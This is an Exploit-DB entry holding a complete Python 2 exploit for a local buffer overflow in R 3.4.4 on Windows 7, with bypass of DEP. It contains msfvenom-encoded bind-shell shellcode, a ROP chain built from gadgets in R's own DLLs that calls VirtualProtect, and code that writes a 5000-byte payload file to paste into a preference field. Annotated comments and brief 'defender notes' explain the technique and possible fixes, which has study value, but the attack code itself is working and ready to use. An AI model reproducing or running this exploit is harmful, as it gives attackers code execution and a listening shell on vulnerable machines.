R 3.4.4 – Local Buffer Overflow (DEP Bypass)

  • 作者: Hashim Jawad
    日期: 2018-05-21
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/44680/
  • # Exploit Title: R v3.4.4 - Local Buffer Overflow (DEP Bypass)
    # Exploit Author: Hashim Jawad
    # Exploit Date: 2018-05-21
    # Vendor Homepage: https://www.r-project.org/
    # Vulnerable Software: https://www.exploit-db.com/apps/a642a3de7b5c2602180e73f4c04b4fbd-R-3.4.4-win.exe
    # Tested on OS: Microsoft Windows 7 Enterprise - SP1 (x86)
    # Steps to reproduce: under GUI preferences, paste payload.txt contents into 'Language for menus and messages'
    
    # Credit to bzyo for finding the bug (44516)
    
    #!/usr/bin/python
    
    import struct
    
    #root@kali:~# msfvenom -p windows/shell_bind_tcp -e x86/alpha_mixed -b "\x00\x0a\x0d\x0e" -f python -v shellcode
    #Payload size: 718 bytes
    # Encoded payload exactly as emitted by the msfvenom command above. It is a
    # Python 2 byte string (the script below uses Python 2 print statements),
    # built by plain concatenation and appended unchanged into the final
    # buffer further down. Almost every byte sits in the printable ASCII range
    # (\x30-\x39, \x41-\x5a, \x61-\x7a), consistent with the alpha_mixed
    # encoder named above; the bad-char list excludes \x00, \x0a, \x0d and
    # \x0e. That printable encoding is presumably what allows the payload to
    # be supplied through the GUI preferences text field named in the header.
    # Any edit to these literals changes the payload bytes, so they are kept
    # verbatim.
    shellcode =""
    shellcode += "\x89\xe0\xdb\xd2\xd9\x70\xf4\x5b\x53\x59\x49\x49"
    shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
    shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
    shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
    shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
    shellcode += "\x69\x6c\x59\x78\x6c\x42\x77\x70\x33\x30\x37\x70"
    shellcode += "\x31\x70\x6b\x39\x6a\x45\x65\x61\x39\x50\x72\x44"
    shellcode += "\x6e\x6b\x30\x50\x56\x50\x4e\x6b\x62\x72\x56\x6c"
    shellcode += "\x6c\x4b\x31\x42\x34\x54\x4c\x4b\x62\x52\x64\x68"
    shellcode += "\x56\x6f\x68\x37\x70\x4a\x61\x36\x55\x61\x79\x6f"
    shellcode += "\x6e\x4c\x75\x6c\x73\x51\x51\x6c\x67\x72\x46\x4c"
    shellcode += "\x57\x50\x4b\x71\x5a\x6f\x36\x6d\x76\x61\x6b\x77"
    shellcode += "\x7a\x42\x39\x62\x76\x32\x73\x67\x6e\x6b\x36\x32"
    shellcode += "\x72\x30\x4e\x6b\x73\x7a\x55\x6c\x4e\x6b\x62\x6c"
    shellcode += "\x42\x31\x72\x58\x38\x63\x51\x58\x35\x51\x6b\x61"
    shellcode += "\x52\x71\x4e\x6b\x72\x79\x31\x30\x57\x71\x78\x53"
    shellcode += "\x6c\x4b\x50\x49\x64\x58\x6b\x53\x77\x4a\x70\x49"
    shellcode += "\x6e\x6b\x37\x44\x4e\x6b\x67\x71\x4b\x66\x45\x61"
    shellcode += "\x69\x6f\x6c\x6c\x49\x51\x6a\x6f\x46\x6d\x57\x71"
    shellcode += "\x5a\x67\x56\x58\x39\x70\x42\x55\x4b\x46\x74\x43"
    shellcode += "\x53\x4d\x59\x68\x35\x6b\x73\x4d\x47\x54\x64\x35"
    shellcode += "\x5a\x44\x36\x38\x6c\x4b\x56\x38\x57\x54\x76\x61"
    shellcode += "\x38\x53\x43\x56\x4c\x4b\x64\x4c\x30\x4b\x6c\x4b"
    shellcode += "\x33\x68\x35\x4c\x57\x71\x59\x43\x6c\x4b\x36\x64"
    shellcode += "\x6c\x4b\x46\x61\x4e\x30\x6b\x39\x63\x74\x47\x54"
    shellcode += "\x55\x74\x31\x4b\x43\x6b\x50\x61\x71\x49\x52\x7a"
    shellcode += "\x62\x71\x6b\x4f\x6b\x50\x61\x4f\x51\x4f\x32\x7a"
    shellcode += "\x6c\x4b\x66\x72\x5a\x4b\x4c\x4d\x71\x4d\x50\x68"
    shellcode += "\x76\x53\x45\x62\x65\x50\x75\x50\x31\x78\x73\x47"
    shellcode += "\x71\x63\x74\x72\x31\x4f\x62\x74\x75\x38\x50\x4c"
    shellcode += "\x70\x77\x55\x76\x36\x67\x49\x6f\x6b\x65\x6d\x68"
    shellcode += "\x7a\x30\x73\x31\x55\x50\x65\x50\x36\x49\x78\x44"
    shellcode += "\x33\x64\x62\x70\x65\x38\x65\x79\x6d\x50\x30\x6b"
    shellcode += "\x43\x30\x39\x6f\x39\x45\x31\x7a\x56\x68\x70\x59"
    shellcode += "\x70\x50\x69\x72\x59\x6d\x37\x30\x70\x50\x71\x50"
    shellcode += "\x50\x50\x33\x58\x39\x7a\x46\x6f\x79\x4f\x6d\x30"
    shellcode += "\x59\x6f\x69\x45\x7a\x37\x75\x38\x65\x52\x43\x30"
    shellcode += "\x37\x61\x63\x6c\x4f\x79\x5a\x46\x31\x7a\x34\x50"
    shellcode += "\x30\x56\x31\x47\x45\x38\x39\x52\x79\x4b\x66\x57"
    shellcode += "\x42\x47\x59\x6f\x5a\x75\x50\x57\x51\x78\x6c\x77"
    shellcode += "\x48\x69\x54\x78\x69\x6f\x6b\x4f\x59\x45\x72\x77"
    shellcode += "\x75\x38\x33\x44\x7a\x4c\x75\x6b\x39\x71\x49\x6f"
    shellcode += "\x78\x55\x71\x47\x6c\x57\x75\x38\x70\x75\x70\x6e"
    shellcode += "\x42\x6d\x35\x31\x79\x6f\x38\x55\x72\x48\x70\x63"
    shellcode += "\x42\x4d\x71\x74\x37\x70\x4f\x79\x79\x73\x71\x47"
    shellcode += "\x70\x57\x71\x47\x74\x71\x78\x76\x53\x5a\x42\x32"
    shellcode += "\x62\x79\x52\x76\x6b\x52\x59\x6d\x35\x36\x79\x57"
    shellcode += "\x52\x64\x35\x74\x57\x4c\x37\x71\x43\x31\x4e\x6d"
    shellcode += "\x50\x44\x36\x44\x56\x70\x59\x56\x47\x70\x42\x64"
    shellcode += "\x46\x34\x70\x50\x36\x36\x50\x56\x50\x56\x71\x56"
    shellcode += "\x42\x76\x30\x4e\x73\x66\x76\x36\x66\x33\x76\x36"
    shellcode += "\x32\x48\x42\x59\x68\x4c\x55\x6f\x6d\x56\x49\x6f"
    shellcode += "\x6b\x65\x4b\x39\x59\x70\x72\x6e\x70\x56\x51\x56"
    shellcode += "\x4b\x4f\x34\x70\x51\x78\x34\x48\x4e\x67\x37\x6d"
    shellcode += "\x51\x70\x59\x6f\x38\x55\x6d\x6b\x6c\x30\x48\x35"
    shellcode += "\x69\x32\x72\x76\x62\x48\x4c\x66\x5a\x35\x4f\x4d"
    shellcode += "\x4d\x4d\x69\x6f\x4a\x75\x65\x6c\x67\x76\x73\x4c"
    shellcode += "\x47\x7a\x4f\x70\x59\x6b\x4b\x50\x70\x75\x57\x75"
    shellcode += "\x6f\x4b\x53\x77\x55\x43\x64\x32\x52\x4f\x51\x7a"
    shellcode += "\x53\x30\x46\x33\x4b\x4f\x4b\x65\x41\x41"
    
    '''
    Output generated by mona.py v2.0, rev 582 - Immunity Debugger
    --------------------------------------------
    Register setup for VirtualProtect() :
    --------------------------------------------
     EAX = NOP (0x90909090)
     ECX = lpOldProtect (ptr to W address)
     EDX = NewProtect (0x40)
     EBX = dwSize
     ESP = lPAddress (automatic)
     EBP = ReturnTo (ptr to jmp esp)
     ESI = ptr to VirtualProtect()
     EDI = ROP NOP (RETN)
    --------------------------------------------
    '''
    
    # ROP chain. Every entry is a 32-bit little-endian value (struct '<L'):
    # either a gadget address inside one of R's own DLLs (R.dll, Riconv.dll,
    # utils.dll, methods.dll, grDevices.dll, Rgraphapp.dll) or an operand
    # consumed by the preceding POP. It fills the registers listed in the
    # mona note above and ends with PUSHAD # RETN. dwSize (0x501) and
    # NewProtect (0x40, PAGE_EXECUTE_READWRITE) are loaded as their two's
    # complement and fixed up with NEG EAX, presumably so that no \x00 byte
    # appears in the chain (the encoder's bad-char list above excludes \x00).
    # The VirtualProtect pointer is not hard-coded: the chain reads it out of
    # the Riconv.dll import table with MOV EAX,[EAX].
    # Defender note: all of these addresses are absolute, so the chain only
    # works while those modules load at the bases seen on the tested Windows 7
    # x86 build - presumably they are not ASLR-enabled there. Building the R
    # DLLs with ASLR (/DYNAMICBASE) support would invalidate every gadget
    # address; the root fix remains the unbounded copy of the preference
    # string that overwrites the return address.
    rop= struct.pack('<L', 0x6cacc7e2)# POP EAX # RETN[R.dll] 
    rop += struct.pack('<L', 0x643cb170)# ptr to &VirtualProtect()[IAT Riconv.dll]
    rop += struct.pack('<L', 0x6e7d5435)# MOV EAX,DWORD PTR DS:[EAX] # RETN [utils.dll] 
    rop += struct.pack('<L', 0x6ca347fa)# XCHG EAX,ESI # RETN [R.dll] 
    rop += struct.pack('<L', 0x6cb7429a)# POP EBP # RETN[R.dll] 
    rop += struct.pack('<L', 0x6ca2a9bd)# & jmp esp [R.dll]
    rop += struct.pack('<L', 0x64c45db2)# POP EAX # RETN[methods.dll] 
    rop += struct.pack('<L', 0xfffffaff)# value to negate, will become 0x00000501
    rop += struct.pack('<L', 0x643c361a)# NEG EAX # RETN[Riconv.dll] 
    rop += struct.pack('<L', 0x6ca33b8a)# XCHG EAX,EBX # RETN [R.dll] 
    rop += struct.pack('<L', 0x6cbef3e4)# POP EAX # RETN[R.dll] 
    rop += struct.pack('<L', 0xffffffc0)# Value to negate, will become 0x00000040
    rop += struct.pack('<L', 0x6ff3a39a)# NEG EAX # RETN[grDevices.dll] 
    rop += struct.pack('<L', 0x6ca558be)# XCHG EAX,EDX # RETN [R.dll] 
    rop += struct.pack('<L', 0x6cbe90a8)# POP ECX # RETN[R.dll] 
    rop += struct.pack('<L', 0x6ff863c1)# &Writable location[grDevices.dll]
    rop += struct.pack('<L', 0x6cbe097f)# POP EDI # RETN[R.dll] 
    rop += struct.pack('<L', 0x6375fe5c)# RETN (ROP NOP)[Rgraphapp.dll]
    rop += struct.pack('<L', 0x6c998f58)# POP EAX # RETN[R.dll] 
    rop += struct.pack('<L', 0x90909090)# nop
    rop += struct.pack('<L', 0x6fedfa6c)# PUSHAD # RETN [grDevices.dll] 
    
    # Final payload layout, fixed at exactly 5000 bytes:
    #   292 bytes of filler up to the saved return address ("EIP"),
    #   the first gadget (POP ESI # RETN) written over that return address,
    #   4 bytes of filler consumed by its POP,
    #   the ROP chain, a 50-byte NOP sled, the shellcode,
    #   then NOP padding that brings the total up to 5000.
    # Defender note: the trigger is this single 5000-byte string pasted into
    # the 'Language for menus and messages' preference field named in the
    # header; presumably it is copied into a fixed-size stack buffer without
    # a length check. Bounding that copy (or the field length) is the fix;
    # DEP alone does not stop it, which is what the ROP chain above is for.
    buffer= '\x41' * 292# filler to EIP
    buffer += struct.pack('<L', 0x6fef93c6) # POP ESI # RETN[grDevices.dll]
    buffer += '\x41' * 4# compensate for pop esi
    buffer += rop
    buffer += '\x90' * 50
    buffer += shellcode
    buffer += '\x90' * (5000-292-4-4-len(rop)-50-len(shellcode))
    
    # Write the buffer to payload.txt, the file the reproduction step in the
    # header pastes from. This is Python 2 code: print statements, and a str
    # that is really a byte string. The file is opened in text mode ('w'),
    # not 'wb'; on Windows that turns every \x0a into \x0d\x0a, which is
    # presumably why \x0a and \x0d are among the encoder's bad chars.
    # NOTE(review): f.close() is not in a finally block, so the handle stays
    # open if write() raises; a `with open(...)` block would close it on every
    # path. The broad except only prints the error and lets the script exit
    # normally, so a failed write is not reported through the exit status.
    try:
    	f=open('payload.txt','w')
    	print '[+] Creating %s bytes evil payload..' %len(buffer)
    	f.write(buffer)
    	f.close()
    	print '[+] File created!'
    except Exception as e:
    	print e